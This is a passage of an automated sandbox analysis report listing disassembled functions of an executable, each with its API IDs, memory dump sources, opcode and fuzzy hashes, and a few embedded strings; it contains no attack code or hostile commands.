                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                        • String ID: Thread pool initialization failed.
                                                                                        • API String ID: 3340455307-2182114853
                                                                                        • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                        • Instruction ID: 9a5074e30995db1ae5f4d7d084f6961591b0adb41fc92e2b6b6fb792ddb63f55
                                                                                        • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                        • Instruction Fuzzy Hash: 9421D832F1564186F710CF26D4847ED3AD2EBE4B08F188034EA2D8A2D5EF7EA445C780
                                                                                        Function 00007FF6FE1A85E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceRelease
                                                                                        • String ID:
                                                                                        • API String ID: 127614599-3916222277
                                                                                        • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                        • Instruction ID: 8d3715efcd97103cbe57546f640386d4e66b1d7802299dfa9330b58875e83d56
                                                                                        • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                        • Instruction Fuzzy Hash: 96E08620F08A4282EB089B76B98903B1751978CBD0F154035F92A87B94DD7CD8844300
                                                                                        Function 00007FF6FE18D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                        • String ID:
                                                                                        • API String ID: 1137671866-0
                                                                                        • Opcode ID: 20228944a5afb91411426e12e74fd9f957feffc0ed5156b7d75ac355226ac421
                                                                                        • Instruction ID: 9058afbc336cc42046c5a1bd24dead0432d9ff46fc9f1a49f667b849efea9083
                                                                                        • Opcode Fuzzy Hash: 20228944a5afb91411426e12e74fd9f957feffc0ed5156b7d75ac355226ac421
                                                                                        • Instruction Fuzzy Hash: A6A18162E1CB8681EB10DB66E4401AD6761FBE5794F405132FA6D87AE9EF3CE648C700
                                                                                        Function 00007FF6FE1A0548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1452528299-0
                                                                                        • Opcode ID: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
                                                                                        • Instruction ID: 27d0ad54e523d893c874be18605909386d11ed1a2a82109f9ff1a297fe6d441e
                                                                                        • Opcode Fuzzy Hash: 1e1ce1e09f3fcb1436f8a63924df09fd4fccf40d73dc660d5d1cbade07bd72dd
                                                                                        • Instruction Fuzzy Hash: A3519262F54A4295FB00DB66D4442FC2722EBE8B98F404232FA2D977D5FE28E649C340
                                                                                        Function 00007FF6FE1A9D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1077098981-0
                                                                                        • Opcode ID: ccc7d28b294f4e6884a1db5a4544c49550100c2123dc1ad4bd8ddaa1afcd3233
                                                                                        • Instruction ID: bcccf0c085aa78e6c4f1598f691ff3d77d8f61944b40fca49e3671c05b712bbe
                                                                                        • Opcode Fuzzy Hash: ccc7d28b294f4e6884a1db5a4544c49550100c2123dc1ad4bd8ddaa1afcd3233
                                                                                        • Instruction Fuzzy Hash: 1D512F32A18B4286EB50CF62E8447AE7B64FBE4B84F501135FA5D97A94EF3CD548CB40
                                                                                        Function 00007FF6FE1BDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 4141327611-0
                                                                                        • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                        • Instruction ID: d91f1254ed50dfe2b5179231c6db2e4b9f0ce06a87ca81d16fad9513ada80891
                                                                                        • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                        • Instruction Fuzzy Hash: 3041B232E0864646FB6DDA1291403B96A90EFE5B90F548135FA6DC6BD5EF7CE8418700
                                                                                        Function 00007FF6FE193980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3823481717-0
                                                                                        • Opcode ID: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
                                                                                        • Instruction ID: a1d24efa5465a7bb1b220f3aab7374784901dd6869230ccdfb9b2c7f80f26bf5
                                                                                        • Opcode Fuzzy Hash: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
                                                                                        • Instruction Fuzzy Hash: 7041B262F1475184FB00CF7AE8851AC2772BBD4BA4B405231EE6E9BBD9EF38D445C200
                                                                                        Function 00007FF6FE1C0B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6FE1BC45B), ref: 00007FF6FE1C0B91
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6FE1BC45B), ref: 00007FF6FE1C0BF3
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6FE1BC45B), ref: 00007FF6FE1C0C2D
                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6FE1BC45B), ref: 00007FF6FE1C0C57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                        • String ID:
                                                                                        • API String ID: 1557788787-0
                                                                                        • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                        • Instruction ID: c1997313e536491d2f45ba08730aaead38609195bed8468b155349eb31e901c3
                                                                                        • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                        • Instruction Fuzzy Hash: B2215221F18B5181E724DF1B64400696AA5FBE4BD0B484174EEAEE3BD4EF3CE4528704
                                                                                        Function 00007FF6FE1BD440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$abort
                                                                                        • String ID:
                                                                                        • API String ID: 1447195878-0
                                                                                        • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                        • Instruction ID: edc0bf831549096f625d5b4546b38b8e58020413d87497dfd0cb02b68708be21
                                                                                        • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                        • Instruction Fuzzy Hash: F7018C14F0860A42FB6CEB77A65617C19A15FF8790F040538F93EC6BD6FD2CB8048201
                                                                                        Function 00007FF6FE1A8590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                        • Instruction ID: f7a840fbeab1aa4315ac28d49ec60fe711c9ba7db8dc1c6aa9d16dea8ead4a89
                                                                                        • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                        • Instruction Fuzzy Hash: 83E0E560F05A0242FF08DB73AC591361A919F98B41F444439F82E867E0FD7CB4498610
                                                                                        Function 00007FF6FE18E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: DXGIDebug.dll
                                                                                        • API String ID: 3668304517-540382549
                                                                                        • Opcode ID: dd85f8b639cc219206ae2105a346c9825e6d5176955616312b0425911fde27d5
                                                                                        • Instruction ID: 03acd73e37edfb1475dde9be33b4d988d8ffa27c73f56079b29006407daba357
                                                                                        • Opcode Fuzzy Hash: dd85f8b639cc219206ae2105a346c9825e6d5176955616312b0425911fde27d5
                                                                                        • Instruction Fuzzy Hash: DD718F72B14B8186EB14CB26E8403AD77A5FBA4794F444236EBAD47B99EF78D151C300
                                                                                        Function 00007FF6FE1BE1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: e+000$gfff
                                                                                        • API String ID: 3215553584-3030954782
                                                                                        • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                        • Instruction ID: 64fb21ed9742bd7cc15cf12278d16752d9963043b1a2866d7ef69cca6891f32c
                                                                                        • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                        • Instruction Fuzzy Hash: DC510462F187C546E725CB36994136A6F91ABE1B90F089271EABCC7BD5EE2CE444C700
                                                                                        Function 00007FF6FE199408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                        • String ID: SIZE
                                                                                        • API String ID: 449872665-3243624926
                                                                                        • Opcode ID: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
                                                                                        • Instruction ID: 2f8f39ad2c95c9ffe4a16a0765a352a7625aebfdca38fd5a133f7f2e58f6322d
                                                                                        • Opcode Fuzzy Hash: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
                                                                                        • Instruction Fuzzy Hash: 634190A2E1868285FB11DB16E4413BE6751EFE57A0F504232FAAD826EAFE3DD544C700
                                                                                        Function 00007FF6FE1BC2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                                                        • API String ID: 3307058713-1957095476
                                                                                        • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                        • Instruction ID: 42aa12e2bcda97db94b2b6875496871f46564d6251739299a87c2eadab8863a6
                                                                                        • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                        • Instruction Fuzzy Hash: AF416E76E08A5686EB18DF27A4400BC7B95EBE8794B444036F96E87BD5EE3DE481C700
                                                                                        Function 00007FF6FE1A9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: ASKNEXTVOL
                                                                                        • API String ID: 445417207-3402441367
                                                                                        • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                        • Instruction ID: 698806f5dbbebcba871f0de19ed30fadf31940f68b6c568a1d85de09d0043571
                                                                                        • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                        • Instruction Fuzzy Hash: 74415D22E08A4281FB10DB13E5502B92BA1AFE5B84F544035FE6DC77E9EE3CE5998340
                                                                                        Function 00007FF6FE199638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_snwprintf
                                                                                        • String ID: $%s$@%s
                                                                                        • API String ID: 2650857296-834177443
                                                                                        • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                        • Instruction ID: 0e95b8840b40904380e9dc0a61377f49a92dd62f828a3392af841eea1ae0d9cf
                                                                                        • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                        • Instruction Fuzzy Hash: F231A172F18A8695EB10CF67E4406E92BA0ABA4784F401032FE2D977E9FE3CE505C700
                                                                                        Function 00007FF6FE1BEB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
